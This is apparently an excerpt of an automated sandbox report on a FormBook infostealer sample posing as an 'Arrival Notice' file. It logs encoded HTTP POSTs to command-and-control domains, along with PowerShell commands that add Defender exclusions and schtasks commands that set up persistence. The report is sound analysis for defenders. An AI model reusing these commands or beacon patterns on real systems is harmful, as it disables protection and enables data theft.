                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvCuOIb9GH8e06oHS1RBwxMw+zIaRa1wfKAVtGvQf3MyQvp4jKdX/4LGRz8DKmWN9ZO5DjVL+jiktaXHCyzy4ZWquizllBjt2Lamu9FXRWxG2rEmnMEbWyzoaxOYdUwxioOePLiweK4AZ1PnpIP4tc6aaD9ELSEjCa2VPfuhZR2At9rg=
                                                                            Jun 19, 2024 22:41:48.510469913 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            49 | 192.168.2.4 | 49793 | 66.96.162.149 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:50.549124002 CEST | 10804 | OUT | POST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:51.661393881 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 1
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            50 | 192.168.2.4 | 49794 | 66.29.145.248 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:51.953722954 CEST | 780 | OUT | POST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Ascii: gheP1DX=PYxFvAfaAHVcdkQ3kto/winU9E2JIQam9H4xZlhKBZvgdoMW0tTHtsIdHnuOwhhkQfa5qYewXzHFre3IbCiOaeDNmvD4MZalpk6sWPsNQ6XMIU9Yuya8tdwVxhrLibrz4LsuzRBcmj1oRpZQWi7KkqK/pgzSxqOYtaxJM2PsK66h9/rxSHdCU33XHlJzGO1qmQ==
                                                                            Jun 19, 2024 22:41:52.564507008 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:52 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            51 | 192.168.2.4 | 49795 | 66.96.162.149 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:53.074821949 CEST | 435 | OUT | GET /mjuo/?tF1tk6=GUK7oVIRF3FAoVitmIo24b7mQO1KNg79CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWshYAEM4vq2qW4/efVo1EPE/sR7lHPgRI0Ri4=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:53.542373896 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            52 | 192.168.2.4 | 49796 | 66.29.145.248 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:54.484353065 CEST | 800 | OUT | POST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Ascii: gheP1DX=PYxFvAfaAHVcfEg3pq8/3Cnbh02JGwac9H0xZgZaCvfgdI8WmsTHk8IdPHuLtxh7QfWbqdmwXz7FrfHIbx6BcODPyfD+Spalpk6sWPorQ6PMIktYvX3qudwSyhrLo7ro4Lt7zRx6mhdoRtdQVxjN9aK12Qycy6+R1JdJTkLUB6yD1Z6rD28VG3TkaiAHLNIj9aXb5s22PaItQ4rOYrkiBSk=
                                                                            Jun 19, 2024 22:41:55.095652103 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:55 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            53 | 192.168.2.4 | 49797 | 66.29.145.248 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:57.013468027 CEST | 10882 | OUT | POST /kscn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Content-Length: 10304
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.zonenail.info
                                                                            Referer: http://www.zonenail.info/kscn/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:57.704416037 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:57 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            54 | 192.168.2.4 | 49798 | 66.29.145.248 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:59.543504953 CEST | 515 | OUT | GET /kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.zonenail.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:42:00.144364119 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:42:00 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            55 | 192.168.2.4 | 49800 | 195.35.39.119 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:42:07.668524981 CEST | 705 | OUT | POST /l4k7/ HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.futuregainers.net
                                                                            Referer: http://www.futuregainers.net/l4k7/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=XdLSOabpDyc+MxYkKYwyoTD1X+qhixW5H8E8dKvzZP+bslCBKuFHuRegX1M0BHYU2XsBtX1Z4UgMy/5ZedTWQV1RopivjOtTHx/R+QSNGJlGFud408hGt93vppKBNf+cFxjq5k7Y5vUgTOTGSvcBKdKTiBA2ryOWiROqxom7PlC9ya2XJmCpYGzOv+UOcNCJeA==
                                                                            Jun 19, 2024 22:42:08.242769957 CEST | 1070 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:42:08 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            56 | 192.168.2.4 | 49802 | 195.35.39.119 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:42:10.202162981 CEST | 725 | OUT | POST /l4k7/ HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.futuregainers.net
                                                                            Referer: http://www.futuregainers.net/l4k7/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=XdLSOabpDyc+NQokI/syuzD2Yeqh0BW9H8I8dLq0e9KbvBKBJstHixegDFM9FHYf2XoJtVxZ4U0My7xZeu7VWF1TgJih+etTHx/R+U6jGJNGEet41Y9Fzt3uopKBHP/VFxi55l325pQgTOjGS9kCBdKRvhAnuCH/sie77emmBRGJ68nNYXj+KGX9y5d6RO/AFPiKC0CFC8L+Rr2gjfwFmHI=
                                                                            Jun 19, 2024 22:42:10.796937943 CEST | 1070 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:42:10 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Target ID:0
                                                                            Start time:16:37:56
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0xb00000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0xd50000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
                                                                            Imagebase:0xd50000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"
                                                                            Imagebase:0x920000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:16:37:59
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0x7ff6ec4b0000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:16:37:59
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Imagebase:0x520000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:16:38:02
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                            Imagebase:0x7ff693ab0000
                                                                            File size:496'640 bytes
                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"
                                                                            Imagebase:0x920000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dLrZsz.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:16:38:21
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:18
                                                                            Start time:16:38:23
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\compact.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                                            Imagebase:0x400000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
